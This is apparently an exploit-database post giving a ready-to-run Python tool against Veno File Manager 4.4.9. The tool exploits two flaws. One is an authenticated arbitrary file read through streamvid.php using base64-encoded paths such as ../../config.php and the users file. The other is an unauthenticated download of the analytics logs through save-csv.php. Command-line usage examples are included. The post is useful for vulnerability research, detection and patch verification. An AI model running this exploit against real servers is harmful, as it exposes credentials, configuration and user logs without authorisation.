==================================================================================================================================
| # Title : Veno File Manager 4.4.9 - Exploit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://veno.es/updates/logs/?slug=vfm/ |
==================================================================================================================================
[+] Summary : This script is an exploit tool for Veno File Manager 4.4.9 that demonstrates two security issues:
Authenticated file disclosure: uses superadmin cookies to read arbitrary server files.
Unauthenticated log access: downloads system logs without needing login.
It sends HTTP requests to the vulnerable endpoints, extracts the sensitive data they return, and can save the downloaded logs locally for analysis.
[+] PoC :
#!/usr/bin/env python3
import requests
import base64
import sys
import argparse
from urllib.parse import urljoin
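class VFMExploit:
    """PoC client for the two Veno File Manager 4.4.9 issues described in the summary.

    Request pattern (as useful for detection and log review as for reproduction):
      1. POST /vfm-admin/index.php with ``starting_dir=./`` using a superadmin session
      2. GET  /vfm-admin/ajax/streamvid.php?vid=<base64 path>  -> the file's contents
      3. POST /vfm-admin/admin-panel/view/analytics/save-csv.php with
         ``logsince``/``loguntil`` and no session cookie at all -> CSV logs

    Every result is printed and returned to the caller; the log export is also
    written to ``logs_<start_date>.csv`` in the current directory.
    """

    # Upper bound for every request so an unresponsive host cannot hang the tool
    # (the original PoC only bounded the log download).
    REQUEST_TIMEOUT = 30

    def __init__(self, target_url):
        """Store the base URL without a trailing slash and open one HTTP session.

        NOTE(review): the endpoints below are joined with ``urljoin`` and a
        leading-slash path, which discards any path component of *target_url*
        (``http://host/vfm`` + ``/vfm-admin/...`` -> ``http://host/vfm-admin/...``).
        Left as-is to keep the original behaviour.
        """
        self.target_url = target_url.rstrip('/')
        self.session = requests.Session()

    def disclose_file_authenticated(self, cookie_name, cookie_value, file_path):
        """
        Vulnerability 1: Arbitrary File Disclosure (Requires superadmin privileges)

        Args:
            cookie_name:  name of the VFM session cookie (e.g. PHPSESSID).
            cookie_value: value of a superadmin session.
            file_path:    path to read; it is base64-encoded and passed through
                          untouched, so the server is what decides how ``../`` is
                          handled.

        Returns:
            The response body as text on HTTP 200, otherwise ``None``.
        """
        print(f"[*] Attempting to read file: {file_path}")
        cookies = {cookie_name: cookie_value}

        # Step 1: change the manager's starting directory to "./" so that the
        # path given in step 2 is resolved from the install root.
        print("[*] Step 1: Changing initial directory to ./")
        post_url = urljoin(self.target_url, "/vfm-admin/index.php")
        prep = self.session.post(
            post_url,
            cookies=cookies,
            data={"starting_dir": "./"},
            verify=False,  # deliberate: lab targets with self-signed certificates
            timeout=self.REQUEST_TIMEOUT,
        )
        if prep.status_code != 200:
            # Not fatal (the original PoC ignored this response entirely), but a
            # non-200 here is the first sign that the session is not superadmin.
            print(f"[!] Step 1 returned HTTP {prep.status_code}; continuing anyway")

        # Step 2: streamvid.php takes a base64 "vid" parameter and streams that
        # path back; per the summary the path is not confined to the manager's
        # own directory.
        print("[*] Step 2: Reading file via streamvid.php")
        encoded_path = base64.b64encode(file_path.encode()).decode()
        get_url = urljoin(self.target_url, f"/vfm-admin/ajax/streamvid.php?vid={encoded_path}")
        response = self.session.get(
            get_url,
            cookies=cookies,
            verify=False,
            timeout=self.REQUEST_TIMEOUT,
        )
        if response.status_code != 200:
            print(f"[✗] Extraction failed. Status code: {response.status_code}")
            return None

        print("[✓] File extracted successfully!")
        print("="*50)
        print(response.text)
        print("="*50)
        return response.text

    def download_logs_unauthenticated(self, start_date):
        """
        Vulnerability 2: Unauthenticated Log Download

        Args:
            start_date: lower bound of the export, yyyy-mm-dd. It is also used
                        verbatim in the local file name ``logs_<start_date>.csv``,
                        so the operator's own argument decides where that file lands.

        Returns:
            The CSV text on HTTP 200 with a non-empty body, otherwise ``None``
            (also on a request or file-write error, which is printed).
        """
        print(f"[*] Attempting to download logs since date: {start_date}")
        post_url = urljoin(self.target_url, "/vfm-admin/admin-panel/view/analytics/save-csv.php")
        # No cookies are sent on purpose: the endpoint answers without a session,
        # which is the issue itself -- server side it should require the admin session.
        data = {
            "logsince": start_date,
            "loguntil": "3000-12-31",  # far-future upper bound: "everything since start_date"
        }

        try:
            response = self.session.post(post_url, data=data, verify=False, timeout=self.REQUEST_TIMEOUT)
        except requests.RequestException as e:
            # Narrowed from a bare ``except Exception`` to the transport errors this call can raise.
            print(f"[✗] Error: {e}")
            return None

        body = response.text
        if response.status_code != 200 or not body:
            print("[✗] No logs found or download failed")
            return None

        print(f"[✓] Logs downloaded successfully! ({len(body)} bytes)")
        print("="*50)
        print(body[:2000])  # Display the first 2000 characters only
        if len(body) > 2000:
            print(f"\n... and {len(body)-2000} more characters remaining")
        print("="*50)

        filename = f"logs_{start_date}.csv"
        try:
            with open(filename, 'w', encoding='utf-8') as f:
                f.write(body)
        except OSError as e:
            print(f"[✗] Error: {e}")
            return None
        # The original message never named the file; report the path actually written.
        print(f"[*] Logs saved to file: {filename}")
        return body

    def exploit_all(self, cookie_name=None, cookie_value=None, file_path=None, start_date=None):
        """
        Execute all possible exploit checks

        A check runs only when all of its inputs were supplied: the file read needs
        cookie_name, cookie_value and file_path; the log download needs start_date.

        Returns:
            dict with one key per executed check ('file_disclosure',
            'logs_download') mapping to that check's return value; empty when
            nothing was requested.
        """
        print("="*60)
        print("Veno File Manager 4.4.9 - Multi Exploit Tool")
        print("="*60)

        results = {}
        if cookie_name and cookie_value and file_path:
            print("\n[+] Executing Exploit 1: File Disclosure")
            results['file_disclosure'] = self.disclose_file_authenticated(
                cookie_name, cookie_value, file_path
            )
        if start_date:
            print("\n[+] Executing Exploit 2: Log Download")
            results['logs_download'] = self.download_logs_unauthenticated(start_date)
        return results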
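def main():
    """Parse the command line and run the selected checks against --url.

    Exits with argparse's usage error (status 2) when no check was requested or
    when --file was given without the cookie pair it needs, instead of printing
    the banner and silently doing nothing as the original did.
    """
    parser = argparse.ArgumentParser(
        description='Veno File Manager 4.4.9 - Exploit Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file vfm-admin/_content/users/users.php
python exploit.py -u http://target.com/vfm --logs 2024-01-01
python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file ../../config.php --logs 2024-01-01
"""
    )
    parser.add_argument('-u', '--url', required=True, help='Application path (e.g., http://target.com/vfm)')
    parser.add_argument('-c', '--cookie-name', help='Session cookie name for authentication')
    parser.add_argument('-v', '--cookie-value', help='Session cookie value for authentication')
    parser.add_argument('-f', '--file', help='Path of the file to read (e.g., ../../config.php)')
    parser.add_argument('-l', '--logs', help='Download logs starting from date (yyyy-mm-dd)')
    args = parser.parse_args()

    # Fail early with a usage message rather than run with nothing to do.
    if not args.file and not args.logs:
        parser.error("nothing to do: give --file (with -c/-v) and/or --logs")
    if args.file and not (args.cookie_name and args.cookie_value):
        parser.error("--file requires both --cookie-name and --cookie-value")

    # Every request is sent with verify=False; silence the per-request TLS warning once.
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    exploit = VFMExploit(args.url)
    exploit.exploit_all(
        cookie_name=args.cookie_name,
        cookie_value=args.cookie_value,
        file_path=args.file,
        start_date=args.logs
    )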
# Script entry point; importing the module (e.g. to reuse VFMExploit) runs nothing.
if __name__ == "__main__":
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================